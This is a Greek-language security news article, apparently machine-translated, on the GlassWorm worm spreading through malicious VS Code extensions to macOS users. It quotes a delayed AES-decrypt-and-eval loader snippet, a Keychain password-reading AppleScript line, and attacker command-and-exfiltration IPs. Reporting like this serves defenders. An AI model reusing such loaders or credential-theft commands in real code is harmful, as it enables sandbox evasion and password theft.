By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
TechReport.grTechReport.grTechReport.gr
Search
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Reading: Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS
Share
Sign In
Notification Show More
Font ResizerAa
TechReport.grTechReport.gr
Font ResizerAa
Search
Have an existing account? Sign In
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
TechReport.gr > Security > Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS
Security

Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS

Marizas Dimitris
Last updated: 31 Δεκεμβρίου 2025 19:23
Marizas Dimitris
Share
Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS
Αυτοδιάδοση GlassWorm Weaponizing VS Code Extensions για επίθεση σε χρήστες macOS
SHARE


Ένα νέο κύμα κακόβουλου λογισμικού GlassWorm έχει εμφανιστεί, σηματοδοτώντας μια σημαντική αλλαγή στη στρατηγική στόχευσης από τα Windows στα συστήματα macOS. Αυτός ο αυτοδιαδιδόμενος ιός τύπου worm, που διανέμεται μέσω κακόβουλων επεκτάσεων VS Code στην αγορά Open VSX, έχει ήδη συγκεντρώσει πάνω από 50.000 λήψεις.

Το τέταρτο κύμα εισάγει πολλές σχετικές αλλαγές, συμπεριλαμβανομένων κρυπτογραφημένων ωφέλιμων φορτίων, δυνατοτήτων trojanization πορτοφολιών υλικού και εξελιγμένων τεχνικών αποφυγής sandbox που του επιτρέπουν να παρακάμψει τα παραδοσιακά εργαλεία σάρωσης ασφαλείας.

Ο ηθοποιός απειλής πίσω από το GlassWorm έχει αποδειχθεί εξαιρετικά προσαρμοστικός, εξελίσσοντας μέσα από τέσσερα διαφορετικά κύματα από τον Οκτώβριο. Οι προηγούμενες καμπάνιες βασίζονταν σε αόρατους χαρακτήρες Unicode και μεταγλωττίστηκαν δυαδικά αρχεία Rust για να κρύψουν κακόβουλο κώδικα.

Η τελευταία επανάληψη εγκαταλείπει αυτές τις προσεγγίσεις υπέρ των κρυπτογραφημένων ωφέλιμων φορτίων JavaScript AES-256-CBC που έχουν σχεδιαστεί ειδικά για περιβάλλοντα macOS.

Prettier Pro σε open-vsx (Πηγή - Koi)
Prettier Pro σε open-vsx (Πηγή – Koi)

Τρεις ύποπτες επεκτάσεις επισημάνθηκαν στην αγορά Open VSX: pro-svelte-extension, vsce-prettier-pro και full-access-catppuccin-pro-extension, όλες συνδεδεμένες μέσω κοινής υποδομής και κλειδιών κρυπτογράφησης.

Το κακόβουλο λογισμικό χρησιμοποιεί μια υποδομή εντολών και ελέγχου βασισμένη σε blockchain Solana που καθιστά σχεδόν αδύνατες τις προσπάθειες κατάργησης.

Αναρτώντας σημειώσεις συναλλαγών που περιέχουν URL με κωδικοποίηση base64 στην αλυσίδα μπλοκ, ο εισβολέας διατηρεί αποκεντρωμένο έλεγχο που δεν μπορεί να διαταραχθεί μέσω του παραδοσιακού αποκλεισμού τομέα.

Οι ερευνητές εντόπισαν την υποδομή στη διεύθυνση IP 45.32.151.157, η οποία χρησιμοποιήθηκε επίσης στο τρίτο κύμα, επιβεβαιώνοντας τη συνέχεια του παράγοντα απειλής.

Koi αναλυτές αναγνωρισθείς το κακόβουλο λογισμικό μέσω της ανάλυσης συμπεριφοράς αφού η μηχανή κινδύνου τους εντόπισε ασυνήθιστα μοτίβα στη συμπεριφορά επέκτασης και στις επικοινωνίες δικτύου.

Κρυπτογραφημένες τακτικές αποφυγής ωφέλιμου φορτίου και Sandbox

Το τέταρτο κύμα εισάγει έναν έξυπνο μηχανισμό χρονισμού που έχει σχεδιαστεί για να αποφεύγει την αυτοματοποιημένη ανάλυση ασφαλείας. Μόλις εγκατασταθεί, η κακόβουλη επέκταση περιμένει ακριβώς 15 λεπτά πριν εκτελέσει το ωφέλιμο φορτίο της.

Αυτή η καθυστέρηση είναι κρίσιμη επειδή τα περισσότερα περιβάλλοντα sandbox λήγουν μετά από 5 λεπτά, πράγμα που σημαίνει ότι το κακόβουλο λογισμικό εμφανίζεται εντελώς ευνοϊκό κατά τη διάρκεια της αυτοματοποιημένης σάρωσης.

Ο κωδικός περιέχει μια κωδικοποιημένη τιμή 9e5 χιλιοστών του δευτερολέπτου (900.000 χιλιοστά του δευτερολέπτου ισούται με 15 λεπτά), η οποία ενεργοποιεί την αποκρυπτογράφηση και την εκτέλεση του κρυπτογραφημένου ωφέλιμου φορτίου AES-256-CBC.

setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);
Κρυπτογραφημένη εκτέλεση ωφέλιμου φορτίου (Πηγή - Koi)
Κρυπτογραφημένη εκτέλεση ωφέλιμου φορτίου (Πηγή – Koi)

Το ίδιο το ωφέλιμο φορτίο είναι ενσωματωμένο στη γραμμή 64 του κύριου αρχείου επέκτασης, κρυπτογραφημένο με ένα σκληρό κλειδί και διάνυσμα προετοιμασίας που παραμένει συνεπές και στις τρεις κακόβουλες επεκτάσεις.

Αυτή η κοινή κρυπτογραφική υποδομή επιβεβαιώνει ότι ένας μεμονωμένος παράγοντας απειλής είναι υπεύθυνος για την καμπάνια.

Μετά τη λήξη της περιόδου καθυστέρησης, το κακόβουλο λογισμικό ανακτά το τρέχον τελικό σημείο εντολών και ελέγχου από την αλυσίδα μπλοκ Solana και εκτελεί οποιεσδήποτε οδηγίες λαμβάνει.

Το ωφέλιμο φορτίο για το macOS περιλαμβάνει AppleScript για stealth εκτέλεση, LaunchAgents για persistence και όχι κλειδιά μητρώου των Windows και άμεση πρόσβαση στη βάση δεδομένων του macOS Keychain για την ανάκτηση αποθηκευμένων κωδικών πρόσβασης και διαπιστευτηρίων.

set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"

Το κακόβουλο λογισμικό περιλαμβάνει επίσης τη δυνατότητα αντικατάστασης εφαρμογών πορτοφολιού υλικού με trojanized εκδόσεις, στοχεύοντας τόσο στο Ledger Live όσο και στο Trezor Suite.

Ενώ η λειτουργία αντικατάστασης πορτοφολιού δεν ήταν πλήρως ενεργή κατά τη διάρκεια της δοκιμής στις 29 Δεκεμβρίου 2025, η υποδομή κωδικών είναι πλήρης και αναμένει μεταφορτώσεις ωφέλιμου φορτίου.

Το κακόβουλο λογισμικό επικυρώνει ότι τα ληφθέντα αρχεία υπερβαίνουν τα 1000 byte πριν από την εγκατάσταση, αποτρέποντας τις κατεστραμμένες εγκαταστάσεις που ενδέχεται να ειδοποιήσουν τα θύματα.

Όλα τα κλεμμένα δεδομένα τοποθετούνται στον προσωρινό κατάλογο /tmp/ijewf/, συμπιέζονται και αποστέλλονται στον διακομιστή exfiltration στο 45.32.150.251/p2p για ανάκτηση από τον εισβολέα.



VIA: cybersecuritynews.com

Η Microsoft Teams Down – Οι χρήστες αντιμετωπίζουν καθυστερήσεις ανταλλαγής μηνυμάτων και διακοπές υπηρεσιών σε όλο τον κόσμο
Η διακοπή DNS επηρεάζει τις υπηρεσίες Azure και Microsoft 365
Η CISA εκδίδει Οδηγίες για τη Διαχείριση Ασφαλούς εκκίνησης UEFI σε συσκευές Enterprise
Η νέα δυνατότητα του Microsoft Teams επιτρέπει στους χρήστες να αναφέρουν μηνύματα που έχουν επισημανθεί εσφαλμένα ως απειλές ασφαλείας
Η SAP διορθώνει τρία κρίσιμα τρωτά σημεία σε πολλά προϊόντα
TAGGED:ασφάλεια στον κυβερνοχώρονέα για την ασφάλεια στον κυβερνοχώρο

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.
[mc4wp_form]
By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Share This Article
Facebook Copy Link Print
Share
ByMarizas Dimitris
Follow:
Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.
Previous Article «Ανακαλύψτε το απίστευτο νέο συμβόλαιο της Nova στα 17 ευρώ – Μη το χάσετε!» «Ανακαλύψτε το απίστευτο νέο συμβόλαιο της Nova στα 17 ευρώ – Μη το χάσετε!»
Next Article Το Samsung Health κερδίζει καλύτερη ανίχνευση ροχαλητού Το Samsung Health κερδίζει καλύτερη ανίχνευση ροχαλητού
Δεν υπάρχουν Σχόλια

Αφήστε μια απάντηση Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Stay Connected

248.1KLike
69.1KFollow
134KPin
54.3KFollow
banner banner
Create an Amazing Newspaper
Discover thousands of options, easy to customize layouts, one-click to import demo and much more.
Learn More

Latest News

Το Samsung Health κερδίζει καλύτερη ανίχνευση ροχαλητού
Το Samsung Health κερδίζει καλύτερη ανίχνευση ροχαλητού
Android Phones Technology
«Ανακαλύψτε το απίστευτο νέο συμβόλαιο της Nova στα 17 ευρώ – Μη το χάσετε!»
«Ανακαλύψτε το απίστευτο νέο συμβόλαιο της Nova στα 17 ευρώ – Μη το χάσετε!»
Technology
Δείτε Πρώτοι τα Εκπληκτικά Νέα Παιχνίδια του PlayStation Plus για τον Ιανουάριο!
Δείτε Πρώτοι τα Εκπληκτικά Νέα Παιχνίδια του PlayStation Plus για τον Ιανουάριο!
Technology
«Ανατρεπτικές Εξελίξεις: Η TEKA Systems Αναλαμβάνει τη Χορηγία του SAP Business Suite Innovation Day 2025!»
«Ανατρεπτικές Εξελίξεις: Η TEKA Systems Αναλαμβάνει τη Χορηγία του SAP Business Suite Innovation Day 2025!»
Technology

You Might also Like

Απειλήστε ηθοποιούς που χρησιμοποιούν οπλισμένα έγγραφα Word και PDF με θέμα AV για να επιτεθούν σε ισραηλινούς οργανισμούς
Security

Απειλήστε ηθοποιούς που χρησιμοποιούν οπλισμένα έγγραφα Word και PDF με θέμα AV για να επιτεθούν σε ισραηλινούς οργανισμούς

Marizas Dimitris
Marizas Dimitris
4 Min Read
Security

Η Google ενεργοποιεί την κοινή χρήση αρχείων Pixel σε iPhone μέσω Quick Share, AirDrop

Marizas Dimitris
Marizas Dimitris
4 Min Read
Η λειτουργικότητα της ουράς διακοπής μηνυμάτων (MSMQ) επηρεάζει τοποθεσίες IIS
Security

Η λειτουργικότητα της ουράς διακοπής μηνυμάτων (MSMQ) επηρεάζει τοποθεσίες IIS

Marizas Dimitris
Marizas Dimitris
3 Min Read
//

We influence 20 million users and is the number one business and technology news network on the planet

Quick Link

  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
  • Blog
  • My Bookmarks
  • Customize Interests
  • Home Technology
  • Contact
  • Technology Home 2
  • Technology Home 3
  • Technology Home 4
  • Technology Home 5

Support

  • Home
  • Πολιτική απορρήτου
  • Σχετικά με εμάς
  • Contact With TechReport
  • Greek Live Channels IPTV 2025

Sign Up for Our Newsletter

Subscribe to our newsletter to get our newest articles instantly!

[mc4wp_form id=”1616″]

TechReport.grTechReport.gr
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Join Us!
Subscribe to our newsletter and never miss our latest news, podcasts etc..
[mc4wp_form]
Zero spam, Unsubscribe at any time.
Welcome Back!

Sign in to your account

Username or Email Address
Password

Lost your password?